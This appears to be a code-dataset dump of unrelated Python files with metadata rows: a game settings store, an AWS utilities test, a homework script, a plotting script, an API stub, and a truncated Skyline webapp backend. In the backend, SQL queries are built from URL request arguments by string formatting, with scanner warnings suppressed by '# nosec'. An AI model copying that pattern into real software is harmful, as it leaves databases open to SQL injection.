self.timeoutTimer = AutoTimer(autoStoreInterval * 1000, self.WriteToDisk)
def GetValues(self, groupName):
return self.datastore[groupName]
def Get(self, groupName, settingName):
"""
We keep track of last access for each entry - see FlushOldEntries below.
"""
if groupName not in self.datastore:
self.CreateGroup(groupName)
if settingName in self.datastore[groupName]:
value = self.datastore[groupName][settingName][1]
self.datastore[groupName][settingName] = (blue.os.GetWallclockTime(), value)
return value
else:
n = settingName
if type(n) == types.UnicodeType:
n = n.encode('UTF-8')
return GetAttrs(defaultsetting, self._name, groupName, n)
def HasKey(self, groupName, settingName):
return settingName in self.datastore[groupName]
def Delete(self, groupName, settingName):
if self.HasKey(groupName, settingName):
del self.datastore[groupName][settingName]
def Set(self, groupName, settingName, value):
if groupName not in self.datastore:
self.CreateGroup(groupName)
self.datastore[groupName][settingName] = (blue.os.GetWallclockTime(), value)
self.FlagDirty()
def Remove(self, groupName, settingName = None):
if groupName in self.datastore:
group = self.datastore[groupName]
if settingName:
if settingName in group:
del group[settingName]
else:
del self.datastore[groupName]
self.FlagDirty()
def CreateGroup(self, groupName):
if groupName not in self.__dict__:
self.__dict__[groupName] = self.Group(groupName, self)
if groupName not in self.datastore:
self.datastore[groupName] = {}
def FlagDirty(self):
self._dirty = True
def WriteToDisk(self):
if self._dirty:
self._dirty = False
fn = blue.paths.ResolvePathForWriting(self._filepath)
try:
if os.access(fn, os.F_OK) and not os.access(fn, os.W_OK):
os.chmod(fn, 438)
k = blue.marshal.Save(self.datastore)
blue.win32.AtomicFileWrite(fn, k)
except Exception as e:
log.LogError('Failed writing to disk', str(self), '-', repr(e))
def Unload(self):
self.timeoutTimer = None
self.FlushOldEntries()
self.WriteToDisk()
def Save(self):
self.FlushOldEntries()
self.WriteToDisk()
def FlushOldEntries(self):
"""
Removes all entries older than lastModified.
Default value is 6 weeks ago.
"""
lastModified = blue.os.GetWallclockTime() - const.WEEK * 6
for k, v in self.datastore.iteritems():
for key in v.keys():
if v[key][0] <= lastModified:
del v[key]
self.FlagDirty()
def SetDatastore(self, datastore):
self.datastore = datastore
def GetDatastore(self):
return self.datastore
class YAMLSettingSection(SettingSection):
def __init__(self, name, filepath, autoStoreInterval, service):
SettingSection.__init__(self, name, filepath, autoStoreInterval, service)
def LoadFromFile(self, filepath, autoStoreInterval):
data = None
try:
fn = blue.paths.ResolvePath(filepath)
data = blue.win32.AtomicFileRead(fn)
except:
pass
if data and data[0]:
try:
yaml.CSafeLoader.add_constructor(u'tag:yaml.org,2002:str', StringToUnicodeConstructor)
self.datastore = yaml.load(data[0], Loader=yaml.CSafeLoader)
for k, v in self.datastore.iteritems():
self.CreateGroup(k)
except:
log.LogError('Error loading settings data file -- ', traceback.format_exc())
self.timeoutTimer = AutoTimer(autoStoreInterval * 1000, self.WriteToDisk)
def WriteToDisk(self):
uthread.new(self._WriterThreadFunc)
def _WriterThreadFunc(self):
if self._dirty:
self._dirty = False
fn = blue.paths.ResolvePathForWriting(self._filepath)
try:
if os.access(fn, os.F_OK) and not os.access(fn, os.W_OK):
os.chmod(fn, 438)
k = yaml.dump(self.datastore, Dumper=yaml.CSafeDumper)
blue.win32.AtomicFileWrite(fn, k)
except Exception as e:
log.LogError('Failed writing to disk', str(self), '-', repr(e))
def LoadBaseSettings():
"""
Temp, currently used by standalone carbonui
"""
import __builtin__
if not hasattr(__builtin__, 'settings'):
__builtin__.settings = Bunch()
sections = (('user', session.userid, 'dat'), ('char', session.charid, 'dat'), ('public', None, 'yaml'))
def _LoadSettingsIntoBuiltins(sectionName, identifier, settingsClass, extension):
key = '%s%s' % (sectionName, identifier)
filePath = blue.paths.ResolvePathForWriting(u'settings:/core_%s_%s.%s' % (sectionName, identifier or '_', extension))
section = settingsClass(sectionName, filePath, 62, service=None)
__builtin__.settings.Set(sectionName, section)
for sectionName, identifier, format in sections:
_LoadSettingsIntoBuiltins(sectionName, identifier, SettingSection, 'dat')
settings.public.CreateGroup('generic')
settings.public.CreateGroup('device')
settings.public.CreateGroup('ui')
settings.public.CreateGroup('audio')
settings.user.CreateGroup('tabgroups')
settings.user.CreateGroup('windows')
settings.user.CreateGroup('suppress')
settings.user.CreateGroup('ui')
settings.user.CreateGroup('cmd')
settings.user.CreateGroup('localization')
settings.char.CreateGroup('windows')
settings.char.CreateGroup('ui')
settings.char.CreateGroup('zaction')
def StringToUnicodeConstructor(loader, node):
s = loader.construct_scalar(node)
return unicode(s)
exports = {'uiutil.SettingSection': SettingSection,
'uiutil.YAMLSettingSection': YAMLSettingSection}
| [
"billchang.e@gmail.com"
] | billchang.e@gmail.com |
470279f1566f761e2fe269c7fa4a6b4f68c48f35 | 060ce17de7b5cdbd5f7064d1fceb4ded17a23649 | /fn_aws_utilities/tests/test_funct_fn_get_step_function_execution.py | 69e85aa6d5a7b8b7d1d865e924e6b6f2ada73d71 | [
"MIT"
] | permissive | ibmresilient/resilient-community-apps | 74bbd770062a22801cef585d4415c29cbb4d34e2 | 6878c78b94eeca407998a41ce8db2cc00f2b6758 | refs/heads/main | 2023-06-26T20:47:15.059297 | 2023-06-23T16:33:58 | 2023-06-23T16:33:58 | 101,410,006 | 81 | 107 | MIT | 2023-03-29T20:40:31 | 2017-08-25T14:07:33 | Python | UTF-8 | Python | false | false | 3,073 | py | # -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
import fn_aws_utilities
from mock import patch
import pytest
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from .mock_artifacts import mock_constants, mocked_aws_step_function
PACKAGE_NAME = "fn_aws_utilities"
FUNCTION_NAME = "fn_get_step_function_execution"
# Read the default configuration-data section from the package
config_data = get_config_data(PACKAGE_NAME)
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def call_fn_get_step_function_execution_function(circuits, function_params, timeout=5):
# Create the submitTestFunction event
evt = SubmitTestFunction("fn_get_step_function_execution", function_params)
# Fire a message to the function
circuits.manager.fire(evt)
# circuits will fire an "exception" event if an exception is raised in the FunctionComponent
# return this exception if it is raised
exception_event = circuits.watcher.wait("exception", parent=None, timeout=timeout)
if exception_event is not False:
exception = exception_event.args[1]
raise exception
# else return the FunctionComponent's results
else:
event = circuits.watcher.wait("fn_get_step_function_execution_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestFnGetStepFunctionExecution:
""" Tests for the fn_get_step_function_execution function"""
def test_function_definition(self):
""" Test that the package provides customization_data that defines the function """
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
mock_inputs_1 = {
"execution_arn": "0000"
}
expected_results_1 = {
"startDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S"),
"stopDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S")
}
mock_inputs_2 = {
"execution_arn": "1111"
}
expected_results_2 = {
"startDate": mock_constants.get("DATE_TIME_MOCK_OBJ").strftime("%Y-%m-%d %H:%M:%S"),
"stopDate": None
}
@patch("fn_aws_utilities.components.fn_get_step_function_execution.AwsStepFunction", side_effect=mocked_aws_step_function)
@pytest.mark.parametrize("mock_inputs, expected_results", [
(mock_inputs_1, expected_results_1),
(mock_inputs_2, expected_results_2)
])
def test_success(self, mock_aws_step_function, circuits_app, mock_inputs, expected_results):
""" Test calling with sample values for the parameters """
results = call_fn_get_step_function_execution_function(circuits_app, mock_inputs)
assert(expected_results == results)
| [
"travis@example.org"
] | travis@example.org |
08a1e71a298632f21bbaf6a642b26963207b28c4 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2234/60636/265682.py | 7f5892bbcb14ddbeb52302932a7f2c3a611488fa | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,292 | py | from itertools import combinations
n=int(input())
p=int(input())
jiandie=[]
starts=[]
for i in range(n):
jiandie.append(0)
for i in range(p):
x=input().split(" ")
starts.append(int(x[0])-1)
jiandie[int(x[0])-1]=int(x[1])
r=int(input())
sources=[]
for i in range(n):
source=[]
for j in range(n):
source.append("0")
sources.append(source)
for i in range(r):
x=input().split(" ")
sources[int(x[0])-1][int(x[1])-1]="1"
YES=[]
NO=[]
res=[]
for i in range(len(starts)):
target=[]
target.append(starts[i])
ans=[]
while(len(target)):
x=target.copy()
for a in target:
x.pop(x.index(a))
if not a in ans:
ans.append(a)
for j in range(len(sources[a])):
if sources[a][j]=="1":
if not j in ans and not j in x:
x.append(j)
target=x
res.append(ans)
targets=[]
targets.append(res[0])
res.pop(0)
for i in res:
alls=[]
for j in targets:
if not j in alls:
alls.append(j)
for j in i:
if not j in alls:
targets.append(j)
print(targets)
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
cdfe3f9d3039f42e476a4efec7a3cb47ff8b2c02 | b00840e56173dc2a196442bd354b9e3cc13b17df | /code_fargo/tutorial/compareMigrationRates.py | 55fbadae5550691b2f011813952e4c8a78bbc715 | [] | no_license | Sportsfan77777/vortex | 56c28fb760f6c98de4a7c8fdcf1168d78b4e57af | 780ec14937d1b79e91a367d58f75adc905b8eef2 | refs/heads/master | 2023-08-31T02:50:09.454230 | 2023-08-24T10:55:05 | 2023-08-24T10:55:05 | 41,785,163 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,181 | py | """
plots torque over time
*** uses a smoothing function ***
"""
import sys
import os
import subprocess
import pickle
import numpy as np
from matplotlib import pyplot as plot
from matplotlib import rcParams as rc
from scipy import signal as sig
from scipy.ndimage import filters as ff
import util
## Choose directories ##
directories = ["earth1", "earth4", "earth16", "jupiter2", "jupiter1", "saturn1", "saturn-half"]
###############################################################################
## Set file names ##
orbit_fn = "orbit0.dat"
# Smoothing Function
smooth = lambda array, kernel_size : ff.gaussian_filter(array, kernel_size, mode = 'nearest') # smoothing filter
# Plot Parameters
kernel_size = 20
colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',
'#9467bd', '#8c564b', '#e377c2', '#7f7f7f',
'#bcbd22', '#17becf']
fontsize = 14
linewidth = 3
start_time = 10 # start time
end_time = 95 # end time
def add_track(directory, index):
fn = "../%s/%s" % (directory, orbit_fn)
data = np.loadtxt(fn)
times = data[:, 0] / (2 * np.pi) # Convert to orbital times
sm_axes = data[:, 2] # Planet Semi-Major Axis
dt = times[1] - times[0] # Note: output is constant
smoothed_sm_axes = smooth(sm_axes, kernel_size)
migration_rates = -(np.diff(smoothed_sm_axes) / dt) / smoothed_sm_axes[:-1] # -(da/dt) / a
start = np.searchsorted(times, start_time)
end = np.searchsorted(times, end_time)
xs = times[start : end]; ys = migration_rates[start : end]
plot.plot(xs, ys, linewidth = linewidth, label = directory, c = colors[index])
def make_plot():
# Curves
for i, directory in enumerate(directories):
add_track(directory, i)
# Annotate
plot.title("Migration Rates", fontsize = fontsize + 2)
plot.xlabel(r"$t$", fontsize = fontsize)
plot.ylabel(r"$-\frac{1}{a} \frac{da}{dt}$", fontsize = fontsize)
plot.legend(loc = "upper right")
# Limits
plot.xlim(0, 1.5 * end_time)
#plot.ylim(min_y, max_y)
# Save and Close
plot.savefig("migrationRateComparison.png", bbox_inches = 'tight')
plot.show()
plot.cla()
### PLOTTING ###
make_plot()
| [
"mhammer44444@gmail.com"
] | mhammer44444@gmail.com |
c83f3d3773151f469f78e72a467dd0805bf68c6e | eb40da8906c1a03a22c4c6e2a9eb09ea8f87953c | /api/areas/areas.py | daebbec8e355ce5917c4d364ebeaa1884fad0515 | [
"MIT"
] | permissive | ufosoftwarellc/cannlytics | 677d149f64ee165c2e2adc0f3f39e618c3b2cc10 | 236bd597e30530666400fef6dceaae6de6aa587b | refs/heads/main | 2023-06-02T02:09:01.425087 | 2021-06-19T06:41:12 | 2021-06-19T06:41:12 | 377,613,147 | 0 | 0 | MIT | 2021-06-16T20:00:49 | 2021-06-16T20:00:48 | null | UTF-8 | Python | false | false | 3,025 | py | """
Areas Endpoints | Cannlytics API
Created: 5/8/2021
Updated: 5/8/2021
API endpoints to interface with areas.
"""
# External imports
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
# Internal imports
from api.auth import auth
@api_view(['GET', 'POST', 'DELETE'])
def areas(request, format=None):
"""Get or update information about a areas / locations."""
# Authenticate the user.
claims = auth.verify_session(request)
uid = claims['uid']
if request.method == 'GET':
org_id = ''
ref = '/organizations/%s/areas'
# TODO: If no organization is specified, get the user's
# organizations and get all areas for all licenses.
# IF the organization is specified, get all areas for all
# licenses of the organization.
# If the organization and license is specified, get all areas
# for the given organization's license.
# If a specific area ID is given, get only that area.
# If a filter parameter is given, then return only the areas
# that match the query.
# limit = request.query_params.get('limit', None)
# order_by = request.query_params.get('order_by', 'state')
# data = get_collection(ref, order_by=order_by, limit=limit, filters=[])
# Optional: If a user is using traceability, then is there any
# need to get location data from the API, or is the data in
# Firestore sufficient (given Firestore is syncing with Metrc).
# Otherwise, initialize a Metrc client and get areas from Metrc.
# traced_location = cultivator.get_locations(uid=cultivation_uid)
# # Optional: Get any filters from dict(request.query_params)
return Response([{'make': "Subaru", 'model': "WRX", 'price': 21000}])
elif request.method == 'POST':
# TODO: Either create or update the area.
# # Create a new location using: POST /locations/v1/create
# cultivation_name = 'MediGrow'
# cultivation_original_name = 'medi grow'
# cultivator.create_locations([
# cultivation_original_name,
# 'Harvest Location',
# 'Plant Location',
# 'Warehouse',
# ])
# # Get created location
# cultivation= None
# locations = track.get_locations(action='active', license_number=cultivator.license_number)
# for location in locations:
# if location.name == cultivation_original_name:
# cultivation = location
# # Update the name of the location using: POST /locations/v1/update
# cultivator.update_locations([cultivation.uid], [cultivation_name])
return Response({'data': []})
elif request.method == 'DELETE':
# TODO: Archive the area data and delete from Metrc.
return Response({'data': []}) | [
"keeganskeate@gmail.com"
] | keeganskeate@gmail.com |
708fa4196fbd2dce037bb0ce89e5baf445a9155a | cce6101c03686898310405f089c529e65c8f68fe | /skyline/webapp/backend.py | 444984820f369ac59bdcb48ea002dc787f06ca88 | [
"MIT"
] | permissive | angry-tony/skyline | db5b776f41793eae86063a3a62ffea955eb973ab | 7ff481e2fc37831e539d431f6380b5bc6f4f75aa | refs/heads/master | 2023-03-27T10:13:55.905344 | 2021-03-09T18:08:37 | 2021-03-09T18:08:37 | 350,996,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50,058 | py | import logging
from os import path
import string
import operator
import time
import re
import traceback
from flask import request
# import mysql.connector
# from mysql.connector import errorcode
# @added 20180720 - Feature #2464: luminosity_remote_data
# Added redis and msgpack
from redis import StrictRedis
from msgpack import Unpacker
# @added 20201103 - Feature #3824: get_cluster_data
import requests
# @added 20201125 - Feature #3850: webapp - yhat_values API endoint
import numpy as np
import settings
from skyline_functions import (
mysql_select,
# @added 20180720 - Feature #2464: luminosity_remote_data
# nonNegativeDerivative, in_list, is_derivative_metric,
# @added 20200507 - Feature #3532: Sort all time series
# Added sort_timeseries and removed unused in_list
nonNegativeDerivative, is_derivative_metric, sort_timeseries,
# @added 20201123 - Feature #3824: get_cluster_data
# Feature #2464: luminosity_remote_data
# Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
get_redis_conn_decoded,
# @added 20201125 - Feature #3850: webapp - yhat_values API endoint
get_graphite_metric)
import skyline_version
skyline_version = skyline_version.__absolute_version__
skyline_app = 'webapp'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
REQUEST_ARGS = ['from_date',
'from_time',
'from_timestamp',
'until_date',
'until_time',
'until_timestamp',
'target',
'like_target',
'source',
'host',
'algorithm',
# @added 20161127 - Branch #922: ionosphere
'panorama_anomaly_id',
]
# Converting one settings variable into a local variable, just because it is a
# long string otherwise.
try:
ENABLE_WEBAPP_DEBUG = settings.ENABLE_WEBAPP_DEBUG
except:
logger.error('error :: cannot determine ENABLE_WEBAPP_DEBUG from settings')
ENABLE_WEBAPP_DEBUG = False
# @added 20180720 - Feature #2464: luminosity_remote_data
# Added REDIS_CONN
if settings.REDIS_PASSWORD:
REDIS_CONN = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
REDIS_CONN = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
def panorama_request():
"""
Gets the details of anomalies from the database, using the URL arguments
that are passed in by the :obj:`request.args` to build the MySQL select
query string and queries the database, parse the results and creates an
array of the anomalies that matched the query and creates the
``panaroma.json`` file, then returns the array. The Webapp needs both the
array and the JSONP file to serve to the browser for the client side
``panaroma.js``.
:param None: determined from :obj:`request.args`
:return: array
:rtype: array
.. note:: And creates ``panaroma.js`` for client side javascript
"""
logger.info('determining request args')
def get_ids_from_rows(thing, rows):
found_ids = []
for row in rows:
found_id = str(row[0])
found_ids.append(int(found_id))
# @modified 20191014 - Task #3270: Deprecate string.replace for py3
# Branch #3262: py3
# ids_first = string.replace(str(found_ids), '[', '')
# in_ids = string.replace(str(ids_first), ']', '')
found_ids_str = str(found_ids)
ids_first = found_ids_str.replace('[', '')
in_ids = ids_first.replace(']', '')
return in_ids
try:
request_args_len = len(request.args)
except:
request_args_len = False
latest_anomalies = False
if request_args_len == 0:
request_args_len = 'No request arguments passed'
# return str(request_args_len)
latest_anomalies = True
metric = False
if metric:
logger.info('Getting db id for %s' % metric)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id from metrics WHERE metric=\'%s\'' % metric # nosec
try:
result = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get id from db: %s' % traceback.format_exc())
result = 'metric id not found in database'
return str(result[0][0])
search_request = True
count_request = False
if latest_anomalies:
logger.info('Getting latest anomalies')
# @modified 20191108 - Feature #3306: Record the anomaly_end_timestamp
# Branch #3262: py3
# query = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp from anomalies ORDER BY id DESC LIMIT 10'
query = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp from anomalies ORDER BY id DESC LIMIT 10'
try:
rows = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get anomalies from db: %s' % traceback.format_exc())
rows = []
if not latest_anomalies:
logger.info('Determining search parameters')
# @modified 20191108 - Feature #3306: Record the end_timestamp of anomalies
# Branch #3262: py3
# query_string = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp from anomalies'
query_string = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp from anomalies'
needs_and = False
# If we have to '' a string we cannot escape the query it seems...
do_not_escape = False
if 'metric' in request.args:
metric = request.args.get('metric', None)
if metric and metric != 'all':
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = "select id from metrics WHERE metric='%s'" % (metric) # nosec
try:
found_id = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get app ids from db: %s' % traceback.format_exc())
found_id = None
if found_id:
target_id = str(found_id[0][0])
if needs_and:
new_query_string = '%s AND metric_id=%s' % (query_string, target_id)
else:
new_query_string = '%s WHERE metric_id=%s' % (query_string, target_id)
query_string = new_query_string
needs_and = True
if 'metric_like' in request.args:
metric_like = request.args.get('metric_like', None)
if metric_like and metric_like != 'all':
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id from metrics WHERE metric LIKE \'%s\'' % (str(metric_like)) # nosec
try:
rows = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get metric ids from db: %s' % traceback.format_exc())
return False
rows_returned = None
try:
rows_returned = rows[0]
if ENABLE_WEBAPP_DEBUG:
logger.info('debug :: rows - rows[0] - %s' % str(rows[0]))
except:
rows_returned = False
if ENABLE_WEBAPP_DEBUG:
logger.info('debug :: no rows returned')
if rows_returned:
ids = get_ids_from_rows('metric', rows)
new_query_string = '%s WHERE metric_id IN (%s)' % (query_string, str(ids))
else:
# Get nothing
new_query_string = '%s WHERE metric_id IN (0)' % (query_string)
if ENABLE_WEBAPP_DEBUG:
logger.info('debug :: no rows returned using new_query_string - %s' % new_query_string)
query_string = new_query_string
needs_and = True
if 'count_by_metric' in request.args:
count_by_metric = request.args.get('count_by_metric', None)
if count_by_metric and count_by_metric != 'false':
search_request = False
count_request = True
# query_string = 'SELECT metric_id, COUNT(*) FROM anomalies GROUP BY metric_id ORDER BY COUNT(*) DESC'
query_string = 'SELECT metric_id, COUNT(*) FROM anomalies'
needs_and = False
if 'from_timestamp' in request.args:
from_timestamp = request.args.get('from_timestamp', None)
if from_timestamp and from_timestamp != 'all':
if ":" in from_timestamp:
import time
import datetime
new_from_timestamp = time.mktime(datetime.datetime.strptime(from_timestamp, '%Y%m%d %H:%M').timetuple())
from_timestamp = str(int(new_from_timestamp))
if needs_and:
new_query_string = '%s AND anomaly_timestamp >= %s' % (query_string, from_timestamp)
query_string = new_query_string
needs_and = True
else:
new_query_string = '%s WHERE anomaly_timestamp >= %s' % (query_string, from_timestamp)
query_string = new_query_string
needs_and = True
if 'until_timestamp' in request.args:
until_timestamp = request.args.get('until_timestamp', None)
if until_timestamp and until_timestamp != 'all':
if ":" in until_timestamp:
import time
import datetime
new_until_timestamp = time.mktime(datetime.datetime.strptime(until_timestamp, '%Y%m%d %H:%M').timetuple())
until_timestamp = str(int(new_until_timestamp))
if needs_and:
new_query_string = '%s AND anomaly_timestamp <= %s' % (query_string, until_timestamp)
query_string = new_query_string
needs_and = True
else:
new_query_string = '%s WHERE anomaly_timestamp <= %s' % (query_string, until_timestamp)
query_string = new_query_string
needs_and = True
if 'app' in request.args:
app = request.args.get('app', None)
if app and app != 'all':
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id from apps WHERE app=\'%s\'' % (str(app)) # nosec
try:
found_id = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get app ids from db: %s' % traceback.format_exc())
found_id = None
if found_id:
target_id = str(found_id[0][0])
if needs_and:
new_query_string = '%s AND app_id=%s' % (query_string, target_id)
else:
new_query_string = '%s WHERE app_id=%s' % (query_string, target_id)
query_string = new_query_string
needs_and = True
if 'source' in request.args:
source = request.args.get('source', None)
if source and source != 'all':
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id from sources WHERE source=\'%s\'' % (str(source)) # nosec
try:
found_id = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get source id from db: %s' % traceback.format_exc())
found_id = None
if found_id:
target_id = str(found_id[0][0])
if needs_and:
new_query_string = '%s AND source_id=\'%s\'' % (query_string, target_id)
else:
new_query_string = '%s WHERE source_id=\'%s\'' % (query_string, target_id)
query_string = new_query_string
needs_and = True
if 'algorithm' in request.args:
algorithm = request.args.get('algorithm', None)
# DISABLED as it is difficult match algorithm_id in the
# triggered_algorithms csv list
algorithm = 'all'
if algorithm and algorithm != 'all':
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id from algorithms WHERE algorithm LIKE \'%s\'' % (str(algorithm)) # nosec
try:
rows = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get algorithm ids from db: %s' % traceback.format_exc())
rows = []
ids = get_ids_from_rows('algorithm', rows)
if needs_and:
new_query_string = '%s AND algorithm_id IN (%s)' % (query_string, str(ids))
else:
new_query_string = '%s WHERE algorithm_id IN (%s)' % (query_string, str(ids))
query_string = new_query_string
needs_and = True
if 'host' in request.args:
host = request.args.get('host', None)
if host and host != 'all':
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id from hosts WHERE host=\'%s\'' % (str(host)) # nosec
try:
found_id = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get host id from db: %s' % traceback.format_exc())
found_id = None
if found_id:
target_id = str(found_id[0][0])
if needs_and:
new_query_string = '%s AND host_id=\'%s\'' % (query_string, target_id)
else:
new_query_string = '%s WHERE host_id=\'%s\'' % (query_string, target_id)
query_string = new_query_string
needs_and = True
if 'limit' in request.args:
limit = request.args.get('limit', '10')
else:
limit = '10'
if 'order' in request.args:
order = request.args.get('order', 'DESC')
else:
order = 'DESC'
search_query = '%s ORDER BY id %s LIMIT %s' % (
query_string, order, limit)
if 'count_by_metric' in request.args:
count_by_metric = request.args.get('count_by_metric', None)
if count_by_metric and count_by_metric != 'false':
# query_string = 'SELECT metric_id, COUNT(*) FROM anomalies GROUP BY metric_id ORDER BY COUNT(*) DESC'
search_query = '%s GROUP BY metric_id ORDER BY COUNT(*) %s LIMIT %s' % (
query_string, order, limit)
try:
rows = mysql_select(skyline_app, search_query)
except:
logger.error('error :: failed to get anomalies from db: %s' % traceback.format_exc())
rows = []
anomalies = []
anomalous_metrics = []
if search_request:
# @modified 20191014 - Task #3270: Deprecate string.replace for py3
# Branch #3262: py3
anomalies_json = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
# panorama_json = string.replace(str(anomalies_json), 'anomalies.json', 'panorama.json')
panorama_json = anomalies_json.replace('anomalies.json', 'panorama.json')
if ENABLE_WEBAPP_DEBUG:
logger.info('debug :: panorama_json - %s' % str(panorama_json))
for row in rows:
if search_request:
anomaly_id = str(row[0])
metric_id = str(row[1])
if count_request:
metric_id = str(row[0])
anomaly_count = str(row[1])
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select metric from metrics WHERE id=%s' % metric_id # nosec
try:
result = mysql_select(skyline_app, query)
except:
logger.error('error :: failed to get id from db: %s' % traceback.format_exc())
continue
metric = str(result[0][0])
if search_request:
anomalous_datapoint = str(row[2])
anomaly_timestamp = str(row[3])
anomaly_timestamp = str(row[3])
full_duration = str(row[4])
created_timestamp = str(row[5])
# @modified 20191108 - Feature #3306: Record the anomaly_end_timestamp
# Branch #3262: py3
# anomaly_data = (anomaly_id, metric, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp)
# anomalies.append([int(anomaly_id), str(metric), anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp])
anomaly_end_timestamp = str(row[6])
anomaly_data = (anomaly_id, metric, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp)
anomalies.append([int(anomaly_id), str(metric), anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp])
anomalous_metrics.append(str(metric))
if count_request:
limit_argument = anomaly_count
if int(anomaly_count) > 100:
limit_argument = 100
anomaly_data = (int(anomaly_count), metric, str(limit_argument))
anomalies.append([int(anomaly_count), str(metric), str(limit_argument)])
anomalies.sort(key=operator.itemgetter(int(0)))
if search_request:
with open(panorama_json, 'w') as fh:
pass
# Write anomalous_metrics to static webapp directory
with open(panorama_json, 'a') as fh:
# Make it JSONP with a handle_data() function
fh.write('handle_data(%s)' % anomalies)
if latest_anomalies:
return anomalies
else:
return search_query, anomalies
def get_list(thing):
"""
Get a list of names for things in a database table.
:param thing: the thing, e.g. 'algorithm'
:type thing: str
:return: list
:rtype: list
"""
table = '%ss' % thing
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select %s from %s' % (thing, table) # nosec
logger.info('select %s from %s' % (thing, table)) # nosec
got_results = False
try:
results = mysql_select(skyline_app, query)
got_results = True
except:
logger.error('error :: failed to get list of %ss from %s' % (thing, table))
results = None
things = []
results_array_valid = False
try:
test_results = results[0]
results_array_valid = True
except:
logger.error('error :: invalid results array for get list of %ss from %s' % (thing, table))
if results_array_valid:
logger.info('results: %s' % str(results))
for result in results:
things.append(str(result[0]))
logger.info('things: %s' % str(things))
return things
# @added 20180720 - Feature #2464: luminosity_remote_data
# @modified 20201203 - Feature #3860: luminosity - handle low frequency data
# Add the metric resolution
# def luminosity_remote_data(anomaly_timestamp):
def luminosity_remote_data(anomaly_timestamp, resolution):
"""
Gets all the unique_metrics from Redis and then mgets Redis data for all
metrics. The data is then preprocessed for the remote Skyline luminosity
instance and only the relevant fragments of the time series are
returned. This return is then gzipped by the Flask Webapp response to
ensure the minimum about of bandwidth is used.
:param anomaly_timestamp: the anomaly timestamp
:type anomaly_timestamp: int
:return: list
:rtype: list
"""
message = 'luminosity_remote_data returned'
success = False
luminosity_data = []
logger.info('luminosity_remote_data :: determining unique_metrics')
unique_metrics = []
# If you modify the values of 61 or 600 here, it must be modified in the
# luminosity_remote_data function in
# skyline/luminosity/process_correlations.py as well
# @modified 20201203 - Feature #3860: luminosity - handle low frequency data
# Use the metric resolution
# from_timestamp = int(anomaly_timestamp) - 600
# until_timestamp = int(anomaly_timestamp) + 61
from_timestamp = int(anomaly_timestamp) - (resolution * 10)
until_timestamp = int(anomaly_timestamp) + (resolution + 1)
try:
# @modified 20201123 - Feature #3824: get_cluster_data
# Feature #2464: luminosity_remote_data
# Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# unique_metrics = list(REDIS_CONN.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
REDIS_CONN_DECODED = get_redis_conn_decoded(skyline_app)
unique_metrics = list(REDIS_CONN_DECODED.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
except Exception as e:
